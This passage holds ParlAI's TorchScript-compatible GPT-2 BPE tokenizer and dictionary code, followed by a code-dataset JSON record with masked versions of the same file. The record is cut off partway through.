new_word.extend(word[i:j])
i = j
found = True
break
if not found:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
word = new_word.copy()
if len(word) == 1:
break
else:
pairs = self.get_pairs(word)
return word
def helper_encode(self, text: str) -> List[str]:
"""
Tokenize text.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
bpe_tokens: List[str] = []
for token in self.findall(text):
byte_encoded: List[str] = []
for b in token:
byte_encoded.append(self.byte_encoder[ord(b)])
encoded: List[str] = []
for bpe_token in self.bpe(byte_encoded):
encoded.append(self.encoder[bpe_token])
bpe_tokens.extend(encoded)
return bpe_tokens
def decode(self, tokens: List[str]) -> str:
"""
Decode list of tokens into a text string.
:param tokens:
list of tokens
:return text:
decoded text
"""
output: List[str] = []
accum: List[str] = []
for token in tokens:
if token in self._special_tokens:
if len(accum) > 0:
output.append(self.helper_decode(accum))
accum.clear()
output.append(token)
else:
accum.append(token)
if len(accum) > 0:
output.append(self.helper_decode(accum))
text = ''.join(output)
if self.add_prefix_space:
assert text.startswith(' ')
text = text.lstrip(' ')
return text
def helper_decode(self, tokens: List[str]) -> str:
"""
Decode list of tokens into text string.
:param tokens:
list of tokens
:return:
decoded text
"""
chars: List[str] = []
for token in tokens:
decoded_token = self.decoder[token]
token_chars = self.utf8_chars(decoded_token)
for char in token_chars:
if not torch.jit.is_scripting():
# We iterate over "char", which is supposed to be a single
# character, because the TorchScripted version of the code
# correctly splits a string into single characters in
# self.utf8_chars() but the non-TorchScripted version doesn't
chars.extend(list(char))
else:
chars.append(char)
decoded_chars: List[str] = []
for char in chars:
decoded_chars.append(chr(self.byte_decoder[char]))
return ''.join(decoded_chars)
def utf8_chars(self, s: str) -> List[str]:
"""
An implementation of UTF8 character iteration in TorchScript. There are no
bitwise operations in torchscript, so we compare directly to integer values.
There isn't a lot of validation, for instance if you pass in an improperly
encoded string with an out-of-place continuation byte, or with a non-left-to-
right byte order, you'll get unexpected results and likely throw. Torch itself
takes in unicode strings and encodes them as UTF8, so that should be actively
hard to do.
The logic is simple: looking at the current start-of-character byte.
If its high bit is 0, it's a 1-byte character. Otherwise, the number of
bytes is the number of leading 1s in its binary representation, so
find that number by comparing it directly to ints with the appropriate
representation, then append that many bytes as a character and move past
them to the next start byte.
From pytext.torchscript.utils.
"""
chars: List[str] = []
i = 0
while i < len(s):
byte = ord(s[i])
if byte < 0b10000000:
chars.append(s[i])
i += 1
else:
if byte < 0b11100000:
num_bytes = 2
elif byte < 0b11110000:
num_bytes = 3
elif byte < 0b11111000:
num_bytes = 4
elif byte < 0b11111100:
num_bytes = 5
elif byte < 0b11111110:
num_bytes = 6
elif byte < 0b11111111:
num_bytes = 7
else:
num_bytes = 8
chars.append(s[i : i + num_bytes])
i += num_bytes
return chars
@torch.jit.script
class ScriptableDictionaryAgent:
"""
Builds and/or loads a dictionary.
All code is TorchScriptable.
"""
def __init__(
self,
null_token: str,
end_token: str,
unk_token: str,
start_token: str,
freq: Dict[str, int],
tok2ind: Dict[str, int],
ind2tok: Dict[int, str],
bpe_add_prefix_space: bool,
bpe_encoder: Dict[str, str],
bpe_byte_encoder: Dict[int, str],
fused_key_bpe_ranks: Dict[str, float],
special_tokens: List[str],
):
self.null_token = null_token
self.end_token = end_token
self.unk_token = unk_token
self.start_token = start_token
self.freq = freq
self.tok2ind = tok2ind
self.ind2tok = ind2tok
# cache unk token for later
self._unk_token_idx = self.tok2ind[self.unk_token]
# Initialize tokenizer
self.bpe = ScriptableGpt2BpeHelper(
add_prefix_space=bpe_add_prefix_space,
encoder=bpe_encoder,
byte_encoder=bpe_byte_encoder,
fused_key_bpe_ranks=fused_key_bpe_ranks,
special_tokens=special_tokens,
)
def _word_lookup(self, key: str) -> int:
"""
Return index from token, or unk_token's index, or None.
"""
if key in self.tok2ind:
return self.tok2ind[key]
else:
return self._unk_token_idx
def _index_lookup(self, key: int) -> str:
"""
Return token from index, or unk_token.
"""
if key in self.ind2tok:
return self.ind2tok[key]
else:
return self.unk_token
def gpt2_tokenize(self, text: str):
"""
Tokenize using Gpt2 BPE tokenizer.
"""
return self.bpe_tokenize(text)
def tokenize(self, text: str) -> List[str]:
"""
Return a sequence of tokens from the iterable.
Also handles special tokens for some tokenizers
"""
# calls the selected tokenizer function e.g. 're' => re_tokenize(text)
word_tokens = self.gpt2_tokenize(text)
return word_tokens
def bpe_tokenize(self, text: str) -> List[str]:
"""
Return a sequence of BPE-tokens from the text.
"""
return self.bpe.encode(text)
def txt2vec(self, text: str) -> List[int]:
"""
Convert a string to a vector (list of ints).
First runs a sentence tokenizer, then a word tokenizer.
"""
itr: List[int] = []
for token in self.tokenize(str(text)):
itr.append(self._word_lookup(token))
return itr
def vec2txt(self, vector: List[int]) -> str:
"""
Convert a vector of IDs to a string.
Converts a vector (iterable of ints) into a string, with each token separated by
the delimiter (default ``' '``).
"""
tokens = [self._index_lookup(idx) for idx in vector]
text = self.bpe.decode(tokens)
return text
|
flexible
|
{
"blob_id": "27d5ff5b0253eea36d6b492e929c4220f4b4a5eb",
"index": 1564,
"step-1": "<mask token>\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n <mask token>\n\n def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,\n torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = (self.module.\n reorder_decoder_incremental_state(incremental_state=\n structured_incr_state, inds=inds))\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) ->torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) ->List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n num_passes += 1\n if num_passes > 10000:\n return [\n '*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'\n ]\n if text[idx] == \"'\":\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1:idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(\n text) and not text[idx + 1].isspace():\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isalpha():\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n else:\n while last_matching_idx + 1 < len(text) and not text[\n last_matching_idx + 1].isspace() and not text[\n last_matching_idx + 1].isalpha() and not text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n tokens.append(text[idx:last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n last_space_idx = idx + 1\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n last_space_idx = idx\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],\n byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str]):\n self.add_prefix_space = add_prefix_space\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in self.encoder.items():\n self.decoder[v] = k\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n self.bpe_ranks = fused_key_bpe_ranks\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n output: List[str] = []\n for piece, state in pieces:\n if state is FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n return output\n\n def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) ->List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n if len(pairs) == 0:\n return word\n while True:\n min_rank = self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf')\n )\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n if word[i] == first and i < len(word) - 1 and word[i + 1\n ] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into a text string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) ->List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 128:\n chars.append(s[i])\n i += 1\n else:\n if byte < 224:\n num_bytes = 2\n elif byte < 240:\n num_bytes = 3\n elif byte < 248:\n num_bytes = 4\n elif byte < 252:\n num_bytes = 5\n elif byte < 254:\n num_bytes = 6\n elif byte < 255:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i:i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(self, null_token: str, end_token: str, unk_token: str,\n start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],\n ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:\n Dict[str, str], bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n self._unk_token_idx = self.tok2ind[self.unk_token]\n self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=\n bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=\n bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens)\n\n def _word_lookup(self, key: str) ->int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx\n\n def _index_lookup(self, key: int) ->str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n \"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n word_tokens = self.gpt2_tokenize(text)\n return word_tokens\n\n def bpe_tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) ->List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) ->str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-2": "<mask token>\n\n\nclass BaseIncrStateFlattener(nn.Module):\n <mask token>\n\n def __init__(self, module: nn.Module):\n super().__init__()\n self.module = module\n <mask token>\n\n def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,\n Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:\n \"\"\"\n Flatten the input incremental state.\n\n For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored\n in flat_incr_state['layer_0__self_attn__prev_key'].\n \"\"\"\n flat_incr_state = {}\n for layer_idx, dict1 in structured_incr_state.items():\n for attn_type, dict2 in dict1.items():\n for state_type, state in dict2.items():\n key = f'{layer_idx:d}__{attn_type}__{state_type}'\n flat_incr_state[key] = state\n return flat_incr_state\n\n\nclass DecoderIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .forward().\n \"\"\"\n\n def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.\n Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.\n Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n if flat_incr_state is not None:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n else:\n structured_incr_state = None\n tensor, new_structured_incr_state = self.module.forward(input=\n input_, encoder_state=encoder_state, incr_state=\n structured_incr_state)\n new_flat_incr_state = self._flatten_incr_state(\n new_structured_incr_state)\n return tensor, new_flat_incr_state\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .reorder_decoder_incremental_state(). We also support .output(), which is also\n traced.\n \"\"\"\n\n def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,\n torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = (self.module.\n reorder_decoder_incremental_state(incremental_state=\n structured_incr_state, inds=inds))\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) ->torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) ->List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n num_passes += 1\n if num_passes > 10000:\n return [\n '*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'\n ]\n if text[idx] == \"'\":\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1:idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(\n text) and not text[idx + 1].isspace():\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isalpha():\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n else:\n while last_matching_idx + 1 < len(text) and not text[\n last_matching_idx + 1].isspace() and not text[\n last_matching_idx + 1].isalpha() and not text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n tokens.append(text[idx:last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n last_space_idx = idx + 1\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n last_space_idx = idx\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],\n byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str]):\n self.add_prefix_space = add_prefix_space\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in self.encoder.items():\n self.decoder[v] = k\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n self.bpe_ranks = fused_key_bpe_ranks\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n output: List[str] = []\n for piece, state in pieces:\n if state is FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n return output\n\n def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) ->List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n if len(pairs) == 0:\n return word\n while True:\n min_rank = self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf')\n )\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n if word[i] == first and i < len(word) - 1 and word[i + 1\n ] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into a text string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) ->List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 128:\n chars.append(s[i])\n i += 1\n else:\n if byte < 224:\n num_bytes = 2\n elif byte < 240:\n num_bytes = 3\n elif byte < 248:\n num_bytes = 4\n elif byte < 252:\n num_bytes = 5\n elif byte < 254:\n num_bytes = 6\n elif byte < 255:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i:i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(self, null_token: str, end_token: str, unk_token: str,\n start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],\n ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:\n Dict[str, str], bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n self._unk_token_idx = self.tok2ind[self.unk_token]\n self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=\n bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=\n bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens)\n\n def _word_lookup(self, key: str) ->int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx\n\n def _index_lookup(self, key: int) ->str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n \"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n word_tokens = self.gpt2_tokenize(text)\n return word_tokens\n\n def bpe_tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) ->List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) ->str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-3": "<mask token>\n\n\nclass BaseIncrStateFlattener(nn.Module):\n <mask token>\n\n def __init__(self, module: nn.Module):\n super().__init__()\n self.module = module\n\n def _unflatten_incr_state(self, flat_incr_state: Dict[str, torch.Tensor]\n ) ->Dict[int, Dict[str, Dict[str, torch.Tensor]]]:\n \"\"\"\n Unflatten the input incremental state.\n\n For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in\n structured_incr_state[0]['self_attn']['prev_key'].\n \"\"\"\n structured_incr_state = defaultdict(lambda : defaultdict(dict))\n for key, state in flat_incr_state.items():\n layer_idx_str, attn_type, state_type = key.split('__')\n structured_incr_state[int(layer_idx_str)][attn_type][state_type\n ] = state\n return dict({k: dict(v) for k, v in structured_incr_state.items()})\n\n def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,\n Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:\n \"\"\"\n Flatten the input incremental state.\n\n For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored\n in flat_incr_state['layer_0__self_attn__prev_key'].\n \"\"\"\n flat_incr_state = {}\n for layer_idx, dict1 in structured_incr_state.items():\n for attn_type, dict2 in dict1.items():\n for state_type, state in dict2.items():\n key = f'{layer_idx:d}__{attn_type}__{state_type}'\n flat_incr_state[key] = state\n return flat_incr_state\n\n\nclass 